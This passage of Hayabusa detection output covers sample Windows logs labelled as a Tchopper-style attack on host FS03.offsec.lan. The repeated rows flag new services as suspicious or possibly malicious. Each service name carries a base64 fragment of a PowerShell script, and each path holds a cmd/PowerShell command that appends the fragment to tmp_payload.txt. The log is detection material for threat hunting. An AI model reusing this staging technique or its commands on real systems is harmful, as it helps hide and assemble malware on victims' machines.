start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:13.158 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIkNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg206"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:14.614 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: dWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQoNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg207"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:14.614 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQoNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg207"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:14.614 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQoNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg207"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:16.115 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdldCB0aGUgbGlzdCBvZiBjb21wdXRlcnMgYmFzZWQgb24gdGhlIHVzZXJzIHNl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg208"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:16.115 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdldCB0aGUgbGlzdCBvZiBjb21wdXRlcnMgYmFzZWQgb24gdGhlIHVzZXJzIHNl | Path: c:\windows\system32\cmd.exe /c powershell -command 
""Get-Service ""seg208"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:16.115 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdldCB0aGUgbGlzdCBvZiBjb21wdXRlcnMgYmFzZWQgb24gdGhlIHVzZXJzIHNl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg208"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:17.556 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: bGVjdGVkIGxpc3QgdHlwZQ0KDQojQHBhcmFtICRDb21wdXRlckxpc3RUeXBlICAgLT4gVGhlIHR5cGUgb2YgY29tcHV0ZXIgbGlzdCAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg209"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:17.556 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 
bGVjdGVkIGxpc3QgdHlwZQ0KDQojQHBhcmFtICRDb21wdXRlckxpc3RUeXBlICAgLT4gVGhlIHR5cGUgb2YgY29tcHV0ZXIgbGlzdCAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg209"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:17.556 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bGVjdGVkIGxpc3QgdHlwZQ0KDQojQHBhcmFtICRDb21wdXRlckxpc3RUeXBlICAgLT4gVGhlIHR5cGUgb2YgY29tcHV0ZXIgbGlzdCAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg209"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:19.033 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtQ29tcHV0ZXJMaXN0IHsgcGFyYW0oJENvbXB1dGVyTGlzdFR5 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg210"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:19.033 
+09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtQ29tcHV0ZXJMaXN0IHsgcGFyYW0oJENvbXB1dGVyTGlzdFR5 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg210"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:19.033 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtQ29tcHV0ZXJMaXN0IHsgcGFyYW0oJENvbXB1dGVyTGlzdFR5 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg210"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:20.486 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: cGUpDQoNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgJENvbXB1dGVyTGlzdCA9IEB7fTsNCg0KICAgICAgICBzd2l0Y2goJENvbXB1dGVyTGlzdFR5cGUpIHsNCg0KICAgICAgICAgICAgJERPTUFJTl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg211"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" +2021-11-03 17:20:20.486 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cGUpDQoNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgJENvbXB1dGVyTGlzdCA9IEB7fTsNCg0KICAgICAgICBzd2l0Y2goJENvbXB1dGVyTGlzdFR5cGUpIHsNCg0KICAgICAgICAgICAgJERPTUFJTl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg211"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:20.486 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cGUpDQoNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgJENvbXB1dGVyTGlzdCA9IEB7fTsNCg0KICAgICAgICBzd2l0Y2goJENvbXB1dGVyTGlzdFR5cGUpIHsNCg0KICAgICAgICAgICAgJERPTUFJTl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg211"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:22.080 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 9PUFQgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaXN0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg212"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:22.080 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9PUFQgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaXN0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg212"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:22.080 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9PUFQgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaXN0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg212"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:23.533 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IEROU0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg213"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:23.533 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IEROU0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg213"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:23.533 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IEROU0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg213"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:24.976 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICAkQ29tcHV0ZXJMaXN0ID0gJEdldEFEQ29tcHV0ZXJMaXN0LkROU0hvc3ROYW1lDQoNCiAgICAgICAgICAgICAgICBicmVhaw0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgfSANCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command 
""Get-Service ""seg214"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:24.976 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAkQ29tcHV0ZXJMaXN0ID0gJEdldEFEQ29tcHV0ZXJMaXN0LkROU0hvc3ROYW1lDQoNCiAgICAgICAgICAgICAgICBicmVhaw0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgfSANCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg214"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:24.976 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAkQ29tcHV0ZXJMaXN0ID0gJEdldEFEQ29tcHV0ZXJMaXN0LkROU0hvc3ROYW1lDQoNCiAgICAgICAgICAgICAgICBicmVhaw0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgfSANCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg214"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:26.423 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 
ICAgICAgIA0KICAgICAgICAgICAgJEZJTEVfT1BUIHsNCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUZpbGVOYW1lICJEZXNrdG9wIiANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg215"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:26.423 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgIA0KICAgICAgICAgICAgJEZJTEVfT1BUIHsNCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUZpbGVOYW1lICJEZXNrdG9wIiANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg215"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:26.423 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgIA0KICAgICAgICAgICAgJEZJTEVfT1BUIHsNCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUZpbGVOYW1lICJEZXNrdG9wIiANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg215"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:27.868 
+09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbnRlbnQgJENvbXB1dGVyTGlzdA0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgJExP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg216"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:27.868 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbnRlbnQgJENvbXB1dGVyTGlzdA0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgJExP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg216"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:27.868 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbnRlbnQgJENvbXB1dGVyTGlzdA0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgJExP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg216"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" +2021-11-03 17:20:29.321 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: Q0FMSE9TVF9PUFQgew0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRDb21wdXRlckxpc3QgPSAibG9jYWxob3N0Ig0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg217"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:29.321 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Q0FMSE9TVF9PUFQgew0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRDb21wdXRlckxpc3QgPSAibG9jYWxob3N0Ig0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg217"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:29.321 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Q0FMSE9TVF9PUFQgew0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRDb21wdXRlckxpc3QgPSAibG9jYWxob3N0Ig0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg217"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:30.774 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgIH0gDQogICAgICAgIH0NCg0KICAgICAgICBSZXR1cm4gJENvbXB1dGVyTGlzdA0KDQogICAgfQ0KDQogICAgY2F0Y2ggew0KICAgIA0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5h | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg218"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:30.774 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgIH0gDQogICAgICAgIH0NCg0KICAgICAgICBSZXR1cm4gJENvbXB1dGVyTGlzdA0KDQogICAgfQ0KDQogICAgY2F0Y2ggew0KICAgIA0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5h | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg218"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:30.774 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgIH0gDQogICAgICAgIH0NCg0KICAgICAgICBSZXR1cm4gJENvbXB1dGVyTGlzdA0KDQogICAgfQ0KDQogICAgY2F0Y2ggew0KICAgIA0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5h | Path: c:\windows\system32\cmd.exe /c powershell -command 
